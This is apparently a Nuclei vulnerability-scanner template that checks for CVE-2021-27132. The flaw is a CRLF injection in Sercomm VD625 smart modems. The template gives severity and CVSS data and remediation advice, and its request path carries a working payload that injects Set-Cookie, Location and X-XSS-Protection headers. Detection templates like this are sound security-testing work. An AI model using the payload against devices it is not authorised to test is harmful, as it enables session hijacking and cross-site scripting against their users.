52 lines
1.9 KiB
YAML
52 lines
1.9 KiB
YAML
id: CVE-2021-27132
|
|
|
|
info:
|
|
name: Sercomm VD625 Smart Modems - CRLF Injection
|
|
author: geeknik
|
|
severity: critical
|
|
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to various attacks, including session hijacking, cross-site scripting (XSS), and cache poisoning.
|
|
remediation: |
|
|
Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
|
|
reference:
|
|
- https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
|
|
- http://sercomm.com
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27132
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-27132
|
|
cwe-id: CWE-74
|
|
epss-score: 0.04569
|
|
epss-percentile: 0.92334
|
|
cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: sercomm
|
|
product: agcombo_vd625_firmware
|
|
tags: cve2021,cve,crlf,injection,sercomm,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Disposition: attachment;filename=test.txt"
|
|
- "Set-Cookie:CRLFInjection=Test"
|
|
- "Location: interact.sh"
|
|
- "X-XSS-Protection:0"
|
|
condition: and
|
|
|
|
- type: status
|
|
part: header
|
|
status:
|
|
- 404
|
|
# digest: 4a0a00473045022100c3c3ca233f54bacea5f71f78ea26b8267179e45ee6c3a7364dcc8acd6241805202200be48b9424898ee1b2e1029e0a0361512f63313a91b2df49e94a43ab6940d9a2:922c64590222798bb761d5b6d8e72950 |